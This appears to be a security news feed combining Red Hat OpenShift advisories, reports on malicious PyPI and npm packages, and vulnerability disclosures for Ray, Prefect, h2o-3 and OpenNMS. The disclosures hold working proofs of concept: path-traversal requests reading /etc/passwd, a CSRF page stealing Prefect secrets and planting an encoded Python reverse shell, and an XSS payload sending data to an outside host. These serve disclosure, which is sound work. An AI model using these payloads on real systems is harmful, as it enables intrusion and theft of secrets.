Red Hat Security Advisory 2023-6842-01 - Red Hat OpenShift Container Platform release 4.12.43 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6842.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.43 bug fix and security update  
Advisory ID:        RHSA-2023:6842-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6842  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-5408  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.43 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.43. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2023:6844

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* OpenShift: modification of node role labels (CVE-2023-5408)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-5408

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2242173  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-18951  
https://issues.redhat.com/browse/OCPBUGS-19382  
https://issues.redhat.com/browse/OCPBUGS-20071  
https://issues.redhat.com/browse/OCPBUGS-20583  
https://issues.redhat.com/browse/OCPBUGS-22408  
https://issues.redhat.com/browse/OCPBUGS-22461  
https://issues.redhat.com/browse/OCPBUGS-22719  
https://issues.redhat.com/browse/OCPBUGS-22843  
https://issues.redhat.com/browse/OCPBUGS-23037  
https://issues.redhat.com/browse/OCPBUGS-7768

Red Hat Security Advisory 2023-6842-01

Red Hat Security Advisory 2023-6841-01 - An update is now available for Red Hat OpenShift Container Platform 4.12.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6841.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift Enterprise security update  
Advisory ID:        RHSA-2023:6841-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6841  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.43. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2023:6842

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-6841-01

An unknown threat actor has been observed publishing typosquat packages to the Python Package Index (PyPI) repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain.
The 27 packages, which masqueraded as popular legitimate Python libraries, attracted thousands of downloads,

An unknown threat actor has been observed publishing typosquat packages to the Python Package Index (PyPI) repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain.

The 27 packages, which masqueraded as popular legitimate Python libraries, attracted thousands of downloads, Checkmarx said in a new report. A majority of the downloads originated from the U.S., China, France, Hong Kong, Germany, Russia, Ireland, Singapore, the U.K., and Japan.

"A defining characteristic of this attack was the utilization of steganography to hide a malicious payload within an innocent-looking image file, which increased the stealthiness of the attack," the software supply chain security firm said.

Some of the packages are pyefflorer, pyminor, pyowler, pystallerer, pystob, and pywool, the last of which was planted on May 13, 2023.

A common denominator to these packages is the use of the setup.py script to include references to other malicious packages (i.e., pystob and pywool) that deploy a Visual Basic Script (VBScript) in order to download and execute a file named "Runtime.exe" to achieve persistence on the host.

Embedded within the binary is a compiled file that's capable of gathering information from web browsers, cryptocurrency wallets, and other applications.

An alternate attack chain observed by Checkmarx is said to have hidden the executable code within a PNG image ("uwu.png"), which is subsequently decoded and run to extract the public IP address and the universally unique identifier (UUID) of the affected system.

Pystob and Pywool, in particular, were published under the guise of tools for API management, only to exfiltrate the data to a Discord webhook and attempt to maintain persistence by placing the VBS file in the Windows startup folder.

"This campaign serves as another stark reminder of the ever-present threats that exist in today's digital landscape, particularly in areas where collaboration and open exchange of code are foundational," Checkmarx said.

The development comes as ReversingLabs uncovered a new wave of protestware npm packages that "hide scripts broadcasting messages of peace related to the conflicts in Ukraine and in Israel and the Gaza Strip."

One of the packages, named @snyk/sweater-comb (version 2.1.1), determines the geographic location of the host, and if it's found to be Russia, displays a message criticizing the "unjustified invasion" of Ukraine through another module called "es5-ext"

Another package, e2eakarev, has the description "free palestine protest package" in the package.json file, and carries out similar checks to see if the IP address resolves to Israel, and if so, log what's described as a "harmless protest message" that urges developers to raise awareness about the Palestinian struggle.

It's not just threat actors infiltrating open-source ecosystems. Earlier this week, GitGuardian revealed the presence of 3,938 total unique secrets across 2,922 PyPI projects, of which 768 unique secrets were found to be valid.

This includes AWS keys, Azure Active Directory API keys, GitHub OAuth app keys, Dropbox keys, SSH keys, and credentials associated with MongoDB, MySQL, PostgreSQL, Coinbase and Twilio.

What's more, many of these secrets were leaked more than once, spanning multiple release versions, bringing the total number of occurrences to 56,866.

"Exposing secrets in open-source packages carries significant risks for developers and users alike," GitGuardian's Tom Forbes said. "Attackers can exploit this information to gain unauthorized access, impersonate package maintainers, or manipulate users through social engineering tactics."

The continuous wave of attacks targeting the software supply chain has also prompted the U.S. government to issue new guidance this month for software developers and suppliers to maintain and provide awareness about software security.

"It is recommended that acquisition organizations assign supply chain risk assessments to their buying decisions given the recent high profile software supply chain incidents," the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and the Office of the Director of National Intelligence (ODNI) said.

"Software developers and suppliers should improve their software development processes and reduce the risk of harm to not just employees and shareholders, but also to their users."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts




Cross-site scripting in bootstrap.jsp in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information. The solution is to upgrade to Horizon 32.0.5 or newer and Meridian 2023.1.9 or newer










Meridian
and Horizon installation instructions state that they are intended for
installation within an organization's private networks and should not be
directly accessible from the Internet. 

OpenNMS thanks 

Moshe Apelbaum

 for reporting this issue.









**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-40314: NMS-15790: Transport bootstrap.jsp args in context by fooker · Pull Request #6791 · OpenNMS/opennms

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

**Description**

Local file include allows remote attackers to make an unauthenticated API call and read any file on the system, such as SSH keys.

**Proof of Concept**

    GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: script
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Etag: "174880dae894b157-2020"
    Last-Modified: Thu, 02 Mar 2023 04:48:59 GMT
    Content-Length: 8224
    Accept-Ranges: bytes
    Date: Thu, 24 Aug 2023 23:01:58 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    
    ##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
    [...]
    

**Impact**

Allows attackers to read any file on the server depending on the permissions Ray was run with.

**Occurrences**

CVE-2023-6020: LFI in Ray API - GET /static/ in ray

By Waqas
Apart from displaying these messages, the packages performed no other actions. This indicates that these aren't malicious per se.
This is a post from HackRead.com Read the original post: New Protestware Uses npm Packages to Call for Peace in Gaza and Ukraine

Protestware is a controversial form of activism. Some people believe that it is a necessary evil to draw attention to important issues. Others believe that it is a harmful and unethical practice.

Cybersecurity researchers at ReversingLabs, a prominent software supply chain security provider, have discovered a new wave of Protestware involving **npm packages** hiding scripts that bring attention to the humanitarian crisis in two conflict-ridden regions- Ukraine and the Gaza Strip.

Reversing Labs’ cyber content lead and blog author, Peter Roberts explained that protestware is a unique kind of cyberactivism in which the actor utilizes the ‘open-source software ecosystem’ to record protests against social or political issues. They embed code into the software, which, when installed or used, triggers a message or other action that draws attention to the protestware developer’s cause.

“Application developers conceal political messages inside open source code, often designing it to display to the user after an application is installed or when it is executed,” the **blog post** read.

The same method has been used to call attention to the wars in Ukraine and Gaza. Protestware developers have created software that displays messages condemning the violence. 

In the latest campaign, two different protestware samples were found by researchers. The first one used a popular Node.js package manager npm version, **e2eakarev npm package**, version 7.1.0, published in late October 2023, by an npm user, ‘~updater.downloader.’ It claims to be a ‘free Palestine protest package,’ and has been downloaded eight times so far.

ReversingLabs researcher Lucija Valentić discovered that after installation, this package triggers a postinstall script (index.js) that first checks the location where it is launched. If it is Israel, the package displays an English-language message in the terminal, urging the reader to raise awareness for the ‘Palestinian struggle,’ support the “Boycott, Divest, Sanction (BDS) movement,” and donate to humanitarian aid. The message bears the sign “The Anonymous Protestor.” 

Another package, dubbed “@snyk/sweater-comb”, was discovered, version 2.1.1. This npm package was released in August 2023 by Snyk and included a common JavaScript library module called “es5-ext” (already used in many other applications, including Signal Messenger’s installation executable for Windows). The protestware feature was added to this package in early March 2022, as per Checkmarx’s **report**.

Screenshot: ReversingLabs

When installed, the module executes a postinstall script ‘\_postinstall.js’ that first checks the host device’s geolocation. If it is Russia, a message in the Russian language is displayed urging for peace in Ukraine. 

Tomislav Peričin, Chief Software Architect at ReversingLabs, expressed concern over the rising vulnerabilities and software supply chain attacks, stressing that political messages could escalate over time.

> _“The risks that developers and software consumers face have never been higher, including political messages. Having software perform random acts of political activism does little for the specific cause. But it does decrease the private sector’s already shaky trust in software.”_
> 
> Tomislav Peričin

Referring to the worldwide condemnation of the **Russian invasion of Ukraine**, and the resulting sanctions imposed on Russia, the message encourages readers to download the Tor browser or visit a webpage to circumvent censorship. 

Apart from displaying these messages, the packages performed no other actions. This indicates that these aren’t malicious per se.

Protestware may appear similar to ethical hacking, but it does highlight the persistent nature of risks associated with the open-source software ecosystem. Threat actors can easily manipulate users by exploiting popular applications in the name of protestware.

****_RELATED ARTICLES_****

1.  **Does Hacktivism Really Equal Terrorism?**
2.  **Anonymous hacked Russian TV with Ukraine war footage**
3.  **Anonymous sent 7m texts to Russians, hacked 400 security cams**
4.  **Ukrainian Hacktivists Trick Russian Military Wives for Personal Info**
5.  **Hackers Send Fake Rocket Alerts to Israelis via Hacked Red Alert App**

New Protestware Uses npm Packages to Call for Peace in Gaza and Ukraine

An attacker is able to steal secrets and potentially gain remote code execution via CSRF using the Prefect API.

**Description**

If you are running the dashboard locally there is no csrf/cors/no auth and therefore you are vulnerable to cross site request forgeries. Worse yet, the service is almost certainly at 127.0.0.1:4200, reducing any need for recon or brute force. CSRF/cors/lack of auth is also likely to be a issue on self hosted instances based on the lack of documentation about how to configure auth to function similar to the cloud version.

**Proof of Concept**

    <!doctype html>
    
    <html lang="en">
    
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Prefect cross site request POC</title>
        <meta name="author" content="Joshua Bonnett">
        <meta property="og:title" content="Prefect cross site request POC">
        <meta property="og:description" content="A simple poc for prefect block data extraction ">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
    </head>
    
    <body>
        <hr />
        <h1> Stolen Block content:</h1>
        <div class="block_content"> </div>
        <h1> Stolen Artifact content:</h1>
        <hr />
        <div class="artifacts"> </div>
        <hr />
        <h1> Stolen variable content:</h1>
        <hr />
        <div class="vars"> </div>
        <hr />
        <h1> Notes:</h1>
        Note that this wasn't sent anywhere, but it easily could have been sent with a second post to a server of my
        choosing, and it need not be on its own page, it could be in a ad, 10 iframes deep on a common watering hole site.
    
        Recommendation: actually enforce csrf header requirements, get rid of the "include_secrets" api flag.
        <script>
    
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.block_content').html(y));
    
            fetch("http://127.0.0.1:4200/api/artifacts/latest/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.artifacts').html(y));
            fetch("  http://127.0.0.1:4200/api/variables/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.vars').html(y));
    
            //***** Find process blocks and change them****//
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.json()).then(function (data) {
                data.forEach(element => {
                    if (element.block_type.name == "Process") {
                        fetch("http://127.0.0.1:4200/api/block_documents/" + element.id, {
                            "headers": {
                                "accept": "application/json, text/plain, */*",
                                "accept-language": "en-US,en;q=0.9",
                                "cache-control": "no-cache",
                                "content-type": "application/json",
                                "pragma": "no-cache",
                                "sec-ch-ua-mobile": "?0",
                                "sec-ch-ua-platform": "\"Linux\"",
                                "sec-fetch-dest": "empty",
                                "sec-fetch-mode": "cors",
                                "sec-fetch-site": "same-origin",
                                "sec-gpc": "1",
                                "x-prefect-ui": "true"
                            },
                            "referrer": "http://127.0.0.1:4200/blocks/block/e3129574-2094-4411-a685-5c327a0201df/edit",
                            "body": "{\"data\":{\"command\":[\"python\", \"-c\", \"import base64,sys;exec(base64.b64decode(sys.argv[1]))\", \"aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5MDAxKSk7W29zLmR1cDIocy5maWxlbm8oKSxmKWZvciBmIGluKDAsMSwyKV07cHR5LnNwYXduKCJzaCIp\"], \"stream_output\":true}, \"merge_existing_data\":false}",
                            "method": "PATCH"
                        });
                    }
                });
            });
        </script>
    </body>
    
    </html>
    

**Impact**

Stealing or changing secrets from blocks(example: aws creds, azur cred blocks) Stealing or changing variables inputs from blocks/variables(example: remote file block,) Stealing any output data from artifacts(Example: output from ml runs)

Reverse shell is possible by changing any existing Process blocks to a reverse shell (set to localhost port 9001 in the Poc, but I could have it connect back over the internet), triggers when a flow that uses that block runs. I could add code to trigger a quick run on all flows to ensure connect back shell happens immediately but I leave that to the reader.

A very similar effect could happen within the docker container, Azure Container Instance Job, ECS Task, GCP Cloud Run Job and Kubernetes Job blocks if they are configured. I didn't include them in the poc because of the complexity of setting them up in my dev env, but adapting the poc to each of these block types would be very simple.

I would recommend moving the configuration of those block types into flow code where it isnt updateable from the web, and it can be managed like code.

**Occurrences**

server.py L560

It is worth setting some limits in cors by default, it is a shame to have the middleware but have it wide open.

block\_documents.py L80

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

block\_documents.py L52

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

CVE-2023-6022: Can use csrf to steal/modify block content, artifact content, variables possibly leading to RCE when the dashboard is running on a developers workstation in prefect

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.

**Description**

Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

**Proof of Concept**

Start the h2o-3 API with:

    cd h2o-3.40.0.4
    java -jar h2o.jar
    

Then make these curl requests:

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        $'http://127.0.0.1:54321/3/ImportFiles?path=%2Fetc%2Fpasswd'
    

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin: http://127.0.0.1:54321' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \
        $'http://127.0.0.1:54321/3/ParseSetup'
    

The response:

    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 08 Jun 2023 15:10:27 GMT
    Cache-Control: no-cache
    X-h2o-build-project-version: 3.40.0.4
    X-h2o-rest-api-version-max: 3
    X-h2o-cluster-id: 1686167537026
    X-h2o-cluster-good: true
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
    Content-Type: application/json
    Content-Length: 1457
    
    {"__meta":{"schema_version":3,"schema_name":"ParseSetupV3","schema_type":"ParseSetup"},"_exclude_fields":"","source_frames":[{"__meta":{"schema_version":3,"schema_name":"FrameKeyV3","schema_type":"Key<Frame>"},"name":"nfs://etc/passwd","type":"Key<Frame>","URL":"/3/Frames/nfs://etc/passwd"}],"parse_type":"CSV","separator":32,"single_quotes":false,"check_header":-1,"column_names":null,"skipped_columns":null,"column_types":["String","Enum"],"na_strings":null,"column_name_filter":null,"column_offset":0,"column_count":0,"destination_frame":"passwd.hex","header_lines":0,"number_columns":2,"data":[["nobody:*:-2:-2:Unprivileged","User:/var/empty:/usr/bin/false"],["root:*:0:0:System","Administrator:/var/root:/bin/sh"],["daemon:*:1:1:System","Services:/var/root:/usr/bin/false"],["fakeuser:*:99:99:Fake","User:/Users/danmcinerney/fakeuser:/bin/sh"],["_uucp:*:4:4:Unix","to","Unix","Copy","Protocol:/var/spool/uucp:/usr/sbin/uucico"],["_taskgated:*:13:13:Task","Gate","Daemon:/var/empty:/usr/bin/false"],["_networkd:*:24:24:Network","Services:/var/networkd:/usr/bin/false"],["_installassistant:*:25:25:Install","Assistant:/var/empty:/usr/bin/false"],["_lp:*:26:26:Printing","Services:/var/spool/cups:/usr/bin/false"],["_postfix:*:27:27:Postfix","Mail","Server:/var/spool/postfix:/usr/bin/false"]],"warnings":null,"chunk_size":4194304,"total_filtered_column_count":2,"custom_non_data_line_markers":null,"decrypt_tool":null,"partition_by":null,"escapechar":0}
    

Developers have been contacted 06/08/2023:

    H2O Support
        
    Wed, Jun 7, 4:32 PM (18 hours ago)
        
    to me
    
    Dear Dan McInerney,
    
    We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
    Your ticket id is :  [#105551] 
    
    
    To view the status of the ticket or add comments, please visit
    https://support.h2o.ai/helpdesk/tickets/105551
    
    Your problem description is as below:
    
    The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.
    
    
    
    
    
    Ticket attachments : 1. lfi id rsa.png
    2. Screenshot 2023-06-07 at 4.31.34 PM.png
    
    
    Thank you for your patience.
    
    Sincerely,
    H2O.ai Support Team
    

**Impact**

Remotely accessing every file on the API server with the permissions of the user who ran the command.

**Occurrences**

CVE-2023-6038: LFI in h2o-3 API in h2o-3

H2O is vulnerable to stored XSS vulnerability which can lead to a Local File Include attack.

**Description**

In h2o-3, the data of all open Flows can be leaked or tampered with through Stored XSS vulnerability, and information can be modified or read in the model.

**Proof of Concept**

    hijack = (data) => {
        window.open(`https://b89f8f617e7792dc04cbdf2efbd5e0c9.m.pipedream.net/?data=${data}`)
    }
    flows_data = '';
    flows_name = [];
    fetch('http://localhost:54321/3/NodePersistentStorage/notebook')
        .then((x) => x.text())
        .then((x) => flows_data = JSON.parse(x))
        .then(() => {
            for(i = 0; i < flows_data['entries'].length; i++){
                flows_name.push(flows_data['entries'][i]['name'])
            }
        })
        .then(() => {
            for(i = 0; i < flows_name.length; i++){
                fetch(`http://localhost:54321/3/NodePersistentStorage/notebook/${flows_name[i]}`)
                    .then((x) => x.text())
                    .then((x) => hijack(x))
            }
        })
    
    // aGlqYWNrID0gKGRhdGEpID0+IHsKICAgIHdpbmRvdy5vcGVuKGBodHRwczovL2I4OWY4ZjYxN2U3NzkyZGMwNGNiZGYyZWZiZDVlMGM5Lm0ucGlwZWRyZWFtLm5ldC8/ZGF0YT0ke2RhdGF9YCkKfQpmbG93c19kYXRhID0gJyc7CmZsb3dzX25hbWUgPSBbXTsKZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6NTQzMjEvMy9Ob2RlUGVyc2lzdGVudFN0b3JhZ2Uvbm90ZWJvb2snKQogICAgLnRoZW4oKHgpID0+IHgudGV4dCgpKQogICAgLnRoZW4oKHgpID0+IGZsb3dzX2RhdGEgPSBKU09OLnBhcnNlKHgpKQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX2RhdGFbJ2VudHJpZXMnXS5sZW5ndGg7IGkrKyl7CiAgICAgICAgICAgIGZsb3dzX25hbWUucHVzaChmbG93c19kYXRhWydlbnRyaWVzJ11baV1bJ25hbWUnXSkKICAgICAgICB9CiAgICB9KQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX25hbWUubGVuZ3RoOyBpKyspewogICAgICAgICAgICBmZXRjaChgaHR0cDovL2xvY2FsaG9zdDo1NDMyMS8zL05vZGVQZXJzaXN0ZW50U3RvcmFnZS9ub3RlYm9vay8ke2Zsb3dzX25hbWVbaV19YCkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiB4LnRleHQoKSkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiBoaWphY2soeCkpCiAgICAgICAgfQogICAgfSk=
    

The payload leaking data from all Flows is as above. To use it without any error, you need to base64 encode it.

**How to build**

    # Build H2O
    git clone https://github.com/h2oai/h2o-3.git
    cd h2o-3
    ./gradlew build -x test
    
    You may encounter problems: e.g. npm missing. Install it:
    brew install npm
    
    # Start H2O
    java -jar build/h2o.jar
    
    # Point browser to http://localhost:54321
    

**Step to Reproduce**

1.  Go to http://localhost:54321/flow/index.html
2.  Open the same file : Sample Data.flow
3.  Open the poc file : leak_poc.flow
4.  Click the play button on flows of leak\_poc

**Poc File**

https://drive.google.com/drive/folders/1yINoutLUbj2-kpJHsqiGPxz7jkpBI4MX?usp=sharing

All PoCs and videos can be found on Google Drive above.

**Impact**

All data in this service can be tampered with or leaked without user's permission.

**Occurrences**

CVE-2023-6013: Leaking/modulation Flows/Model data via stored xss in h2o-3

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

**Description**

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

**Proof of Concept**

    GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Date: Thu, 24 Aug 2023 21:49:54 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    Content-Length: 8225
    
    1##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    

**Impact**

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

**Occurrences**

Tag

#js